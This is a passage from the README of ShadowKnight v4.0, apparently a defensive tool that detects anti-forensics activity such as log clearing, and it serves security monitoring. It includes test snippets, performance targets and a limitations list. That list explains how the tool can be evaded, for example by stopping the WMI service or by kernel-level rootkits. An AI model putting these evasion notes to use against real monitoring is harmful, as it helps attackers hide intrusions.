== True assert result['category'] == 'log_clearing' assert result['severity'] == 'CRITICAL' assert 'T1070.001' in result['mitre_attack_ttps'] ### Performance Testing **shadow_knight_v4_stress_test.py**: def stress_test_detection_pipeline(): """Simulate high-volume attack""" # Spawn 1000 processes per second for i in range(1000): subprocess.Popen(['cmd', '/c', 'echo test']) time.sleep(0.001) # Verify: # - All processes detected # - No dropped events # - Detection latency < 10ms # - Memory usage stable (<500MB) **Expected Results**: - Detection Rate: 100% (within keyword scope) - False Positive Rate: <3% (Gemini 2.5 Flash precision) - Detection Latency (Win): <1ms (WMI Events) - Detection Latency (Unix): 10ms (Optimized Polling) - Memory Usage: <400MB under maximum attack load - CPU Usage: <8% (Background deduplication active) ## ⚠️ Known Limitations & Future Roadmap ### Current Limitations **1. Ring 3 Detection Only** - **Issue**: WMI operates at user-mode (Ring 3), can be bypassed by kernel-mode (Ring 0) attacks - **Impact**: Direct kernel shellcode injection not detected - **Mitigation**: v5.0 will include kernel driver (KMDF) for Ring 0 visibility **2. User-Mode Priority** - **Issue**: Monitoring runs in user-space - **Impact**: Some kernel-level stealth techniques (Rootkits) may hide processes from API calls - **Mitigation**: v5.0 KMDF Driver for kernel-level protection **3. WMI Service Dependency** - **Issue**: If WMI service stopped, primary detection fails - **Impact**: Attacker can disable monitoring by stopping WMI - **Mitigation**: Hybrid polling backup, service protection (future) **4. API Rate Limits** - **Issue**: Gemini free tier: 60 requests/min - **Impact**: In high-volume attacks, may hit rate limit - **Mitigation**: Client-side rate limiting, caching, keyword fallback **5. Admin Privilege Requirement** - **Issue**: Full event log capture requires Administrator - **Impact**: Non-admin users get limited evidence (metadata only) - **Mitigation**: Metadata fallback implemented, user education ### Known Issues*: - `#1` - WMI timeout on heavily loaded systems (workaround: increase timeout_ms) - `#2` - False positive on legitimate `vssadmin` usage (add user to allowlist) - `#3` - High memory usage when evidence vault >100GB (implement auto-rotation) ## 📚 Additional Resources ### Documentation - [MITRE ATT&CK Framework](https://attack.mitre.org/) - [Windows WMI Reference](https://docs.microsoft.com/en-us/windows/win32/wmisdk/wmi-reference) - [Google Gemini API Docs](https://ai.google.dev/docs) - [Digital Forensics Best Practices](https://www.nist.gov/itl/ssd/software-quality-group/computer-forensics-tool-testing-program-cftt) ### Related Projects - [Velociraptor](https://github.com/Velocidex/velociraptor) - Endpoint visibility - [OSSEC](https://www.ossec.net/) - Host-based intrusion detection - [Wazuh](https://wazuh.com/) - Security monitoring - [Sysmon](https://docs.microsoft.com/en-us/sysinternals/downloads/sysmon) - Windows event logging ### Academic Papers - ["Anti-Forensics: The Rootkit Connection"](https://www.sans.org/reading-room/whitepapers/forensics/anti-forensics-rootkit-connection-1506) - SANS Institute - ["Defeating Anti-Forensics"](https://www.sciencedirect.com/science/article/pii/S1742287609000073) - Digital Investigation Journal ## 🤝 Contributing ### Development Setup # Fork repository git clone https://github.com/yourusername/shadow_knight-nexus.git cd shadow_knight-nexus # Create feature branch git checkout -b feature/new-detection-rule # Make changes # ... # Run tests python -m pytest tests/ # Submit pull request ### Code Style - **PEP 8** compliance - **Type hints** for all functions - **Docstrings** (Google style) - **Unit tests** for new features (pytest) ### Contribution Areas - Detection rules for new anti-forensics techniques - Integration with additional SIEM platforms - Performance optimizations - Documentation improvements - Bug reports and fixes ## 📄 License **MIT License** Copyright (c) 2026 ShadowKnight Contributors Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions: The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software. THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. **ShadowKnight v4.0** - *Defending the Defenders* © 2026 ShadowKnight Project. All rights reserved.

标签：AI检测, Python, Qt, 反取证检测, 子域名变形, 库, 应急响应, 数字取证, 无后门, 终端安全, 自动化脚本, 证据保全, 逆向工具